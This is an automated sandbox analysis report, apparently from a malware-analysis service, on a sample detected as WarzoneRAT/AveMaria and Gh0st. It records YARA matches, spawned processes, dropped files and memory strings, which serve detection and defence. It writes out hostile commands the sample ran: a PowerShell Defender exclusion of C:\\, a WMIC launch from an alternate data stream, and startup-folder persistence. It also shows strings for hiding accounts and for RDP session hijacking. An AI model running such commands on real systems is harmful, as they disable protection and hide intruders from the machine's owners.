            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000002.298671123.00000000035AF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000003.271113826.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000003.00000002.525763010.0000000003A1F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000003.271046859.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_009BAC800_2_009BAC80
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0072C2D71_2_0072C2D7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00726A481_2_00726A48
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0072B5AA1_2_0072B5AA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0072C2D71_2_0072C2D7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_007293F01_2_007293F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_007215601_2_00721560
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_007215601_2_00721560
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_007215601_2_00721560
            Source: C:\ProgramData\windowupdate.exeCode function: 3_2_00DAAC803_2_00DAAC80
            Source: C:\ProgramData\windowupdate.exeCode function: String function: 00D82900 appears 280 times
            Source: C:\ProgramData\windowupdate.exeCode function: String function: 00D84930 appears 484 times
            Source: C:\ProgramData\windowupdate.exeCode function: String function: 00D50060 appears 49 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: String function: 00994930 appears 438 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: String function: 00992900 appears 239 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: String function: 00960060 appears 45 times
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.304140031.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Variant.Jaik.73085.20962.exe
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000000.255531379.0000000000B34000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Variant.Jaik.73085.20962.exe
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeBinary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Variant.Jaik.73085.20962.exe
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeReversingLabs: Detection: 17%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeJump to behavior
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeProcess created: C:\ProgramData\windowupdate.exe C:\ProgramData\windowupdate.exe
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'
            Source: C:\ProgramData\windowupdate.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\ProgramData\windowupdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeProcess created: C:\ProgramData\windowupdate.exe C:\ProgramData\windowupdate.exeJump to behavior
            Source: C:\ProgramData\windowupdate.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
            Source: C:\ProgramData\windowupdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\Users\user\AppData\Local\Microsoft Vision\Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tacmmont.cza.ps1Jump to behavior
            Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@17/14@0/1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_0094A960 ~Module,~Module,CoCreateInstance,~Module,~Module,StringFromGUID2,~Module,@_RTC_AllocaHelper@12,RegQueryInfoKeyA,RegQueryInfoKeyA,~Module,~Module,~Module,0_2_0094A960
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4240:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_01
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_00942B50 LoadResource,LockResource,SizeofResource,0_2_00942B50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic file information: File size 2054656 > 1048576
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x12a400
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: wuser32.pdb source: windowupdate.exe, 00000003.00000002.527122655.0000000005220000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.526701012.0000000004E1E000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\debug.pdb source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, windowupdate.exe.0.dr, ProgramData_ApplicationData.0.dr
            Source: Binary string: wuser32.pdbUGP source: windowupdate.exe, 00000003.00000002.527122655.0000000005220000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.526701012.0000000004E1E000.00000004.00000800.00020000.00000000.sdmp
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Detected unpacking (creates a PE file in dynamic memory)
            Source: C:\ProgramData\windowupdate.exeUnpacked PE file: 3.2.windowupdate.exe.5220000.5.unpack
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_007220D9 push esp; iretd 1_2_00722139
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00728AC0 pushad ; iretd 1_2_00728AC1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_042BC7EB push eax; ret 1_2_042BC7F1

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\ProgramData:ApplicationDataJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\ProgramData\windowupdate.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\ProgramData:ApplicationDataJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\ProgramData:ApplicationDataJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\ProgramData\windowupdate.exeJump to dropped file

            Boot Survival

            barindex
            Drops script or batch files to the startup folder
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.batJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.batJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:startJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.batJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Contains functionality to hide user accounts
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
